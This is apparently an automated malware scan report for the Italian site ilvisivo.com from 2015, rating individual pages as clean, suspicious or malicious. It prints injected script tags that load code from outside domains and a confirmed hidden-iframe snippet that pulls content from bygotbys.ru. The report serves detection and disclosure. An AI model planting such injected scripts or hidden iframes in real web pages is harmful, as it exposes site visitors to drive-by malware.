Scanned pages/files
Request | Server response | Status |
http://www.ilvisivo.com/ | HTTP/1.1 200 OK Date: Sun, 18 Jan 2015 11:31:30 GMT Accept-Ranges: bytes ETag: "a327ae7eed24cf1:4eb4fe" Server: Microsoft-IIS/6.0 Content-Length: 9552 Content-Location: http://www.ilvisivo.com/index.htm Content-Type: text/html Last-Modified: Sat, 08 Feb 2014 16:47:46 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.ilvisivo.com/index.htm | 200 OK Content-Length: 9552 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://goshin-dojo.de/dtd.php?id=6019400"></script> | ||
http://www.ilvisivo.com/index_htm_files/roe.js | 200 OK Content-Length: 5954 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var a = document.createElement('iframe'); a.src = 'http://bygotbys.ru/count3.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();
Antivirus reports:
| ||
http://www.ilvisivo.com/servizi.htm | 200 OK Content-Length: 7429 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://goshin-dojo.de/dtd.php?id=6019404"></script> | ||
http://www.ilvisivo.com/dove.htm | 200 OK Content-Length: 7837 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://eisl-family.at/includes/relay.php?id=683980"></script> | ||
http://www.ilvisivo.com/galleria.htm | 200 OK Content-Length: 10189 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://goshin-dojo.de/dtd.php?id=6019399"></script> | ||
http://www.ilvisivo.com/index_htm_files/highslide.js | 200 OK Content-Length: 59421 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(!hs){var hs={lang:{cssDirection:"ltr",loadingText:"Loading...",loadingTitle:"Click to cancel",focusTitle:"Click to bring to front",fullExpandTitle:"Expand to actual size (f)",creditsText:"Powered by <i>Highslide JS</i>",creditsTitle:"Go to the Highslide JS homepage",previousText:"Previous",nextText:"Next",moveText:"Move",closeText:"Close",closeTitle:"Close (esc)",resizeTitle:"Resize",playText:"Play",playTitle:"Play slideshow (spacebar)",pauseText:"Pause",pauseTitle:"Pause sl Antivirus reports:
| ||
http://www.ilvisivo.com/index_htm_files/57.jpg | 200 OK Content-Length: 27955 Content-Type: image/jpeg | clean |
http://www.ilvisivo.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.ilvisivo.com/index_htm_files/58.jpg | 200 OK Content-Length: 28971 Content-Type: image/jpeg | clean |
http://www.ilvisivo.com/index_htm_files/59.jpg | 200 OK Content-Length: 29257 Content-Type: image/jpeg | clean |
http://www.ilvisivo.com/index_htm_files/60.jpg | 200 OK Content-Length: 36042 Content-Type: image/jpeg | clean |
http://www.ilvisivo.com/index_htm_files/61.jpg | 200 OK Content-Length: 31666 Content-Type: image/jpeg | clean |
http://www.ilvisivo.com/index_htm_files/62.jpg | 200 OK Content-Length: 17223 Content-Type: image/jpeg | clean |
http://www.ilvisivo.com/index_htm_files/63.jpg | 200 OK Content-Length: 16177 Content-Type: image/jpeg | clean |
http://www.ilvisivo.com/index_htm_files/64.jpg | 200 OK Content-Length: 39379 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ilvisivo.com
Result:
GET / HTTP/1.1
Host: ilvisivo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ilvisivo.com
Referer: http://www.google.com/search?q=ilvisivo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ilvisivo.com
Referer: http://www.google.com/search?q=ilvisivo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ilvisivo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ilvisivo.com/
Result: ilvisivo.com is not infected or malware details are not published yet.
Result: ilvisivo.com is not infected or malware details are not published yet.